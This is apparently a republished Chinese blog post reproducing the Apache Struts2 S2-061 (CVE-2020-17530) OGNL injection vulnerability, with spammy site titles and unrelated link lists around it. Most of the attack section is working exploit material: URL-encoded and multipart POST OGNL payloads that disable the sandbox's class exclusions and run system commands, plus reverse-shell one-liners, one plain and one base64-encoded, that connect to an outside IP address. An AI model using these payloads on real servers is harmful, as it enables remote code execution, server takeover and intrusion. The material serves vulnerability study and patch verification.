当前位置: 首页 > wzjs >正文

视频logo免费生成网站软件中国建设网网站

视频logo免费生成网站软件,中国建设网网站,怎么做网页站点,zhihu网站建设【漏洞复现】Struts2系列 1. 了解Struts21. Struts2 S2-061 RCE (CVE-2020-17530)1. 漏洞描述2. 影响版本3. 复现过程 1. 了解Struts2 Apache Struts2是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 id)的…

【漏洞复现】Struts2系列

  • 1. 了解Struts2
    • 1. Struts2 S2-061 RCE (CVE-2020-17530)
      • 1. 漏洞描述
      • 2. 影响版本
      • 3. 复现过程

1. 了解Struts2

Apache Struts2是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 id)的属性值进行二次表达式解析,因此在某些场景下将可能导致远程代码执行。

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

1. Struts2 S2-061 RCE (CVE-2020-17530)

1. 漏洞描述

Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,可能照成控制服务器等危害。S2-061是对S2-059沙盒进行的绕过

简单描述: 在特定的环境下,远程攻击者通过构造 恶意的OGNL表达式 ,可造成 任意代码执行

2. 影响版本

Apache Struts 2.0.0-2.5.25

3. 复现过程

PoC:

原始:%{ 'test' + (11 + 11).toString()}
url编码: ?id=%25%7b+%27test%27+%2b+(11+%2b+11).toString()%7d

在这里插入图片描述
在这里插入图片描述
漏洞利用:

方法一,可以看到执行相加,这里直接构造payload执行命令

原始:

#application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'id'}).(#res=#exec.exec(#cmd))}

url编码:

 ?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}  

方法二,在首页使用burp抓包发送到重放模块,并修改成POST传输

Content-Type: multipart/form-data;boundary=----WebKitFormBoundary5DQYTI1H
Content-Length: 817------WebKitFormBoundary5DQYTI1H
Content-Disposition: form-data; name="id"%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundary5DQYTI1H--

在这里插入图片描述

方法三,反弹shell

vps上执行监听:nc -lvnp 3333
受害者主机上执行任意一个就行:
bash -i >& /dev/tcp/101.42.37.85/9001 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDIuMzcuODUvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}

在这里插入图片描述

http://www.dtcms.com/wzjs/785872.html

相关文章:

  • 个人备案的网站可以做商城新媒体营销的方式
  • 宁波免费做网站平稳有序推进网站建设
  • 句容网站wordpress汉化模板
  • 建设通网站上能查到的企业怎么改wordpress字体大小
  • 开一家代做网站的公司我要做自媒体要怎么开始
  • 济南免费网站建设网站群内容管理系统
  • 个人网站做哪种能赚钱wordpress很强大
  • 骏域网站当地公交建设公司的官网
  • 手机wap网站特效建设银行网上营业厅
  • 青浦网站设计制作北京谷歌seo
  • 专业做网站设计哪家好去三亚要下载什么app?
  • 长春seo公司网站嵌入式软件开发项目
  • 淘宝网站怎么做的国外建站数据
  • 抚宁区建设局网站网站收录大幅度下降
  • 网站建设前台和后台设计基于android的移动互联网开发
  • 微信公众号seo长沙网站优化
  • 程序员做游戏还是做网站好wordpress+用户组
  • 天津重型网站建设风格网站没有内容可以备案吗
  • 南京浦口住房与城乡建设局网站互联网+创业项目ppt成品
  • 网站地图咋做做网站用什么服务器好
  • 平阴网站建设费用crm客户管理系统功能
  • 做生意在哪个网站做深圳专业做网站设计
  • 免费建站的网站99个人网站的域名注册
  • 做网站怎么做连接点下一个页面网页设计与制作教程教科书
  • 石家庄房地产信息网官网网站开发和优化关系
  • seo优化网站建设为什么网页总是打不开
  • 可以做推广的网站wordpress积分站内搜索
  • php小说采集网站源码欲思 wordpress
  • 管理员网站建设公司网站怎么弄
  • 企业门为什么要建设门户网站产品营销策划方案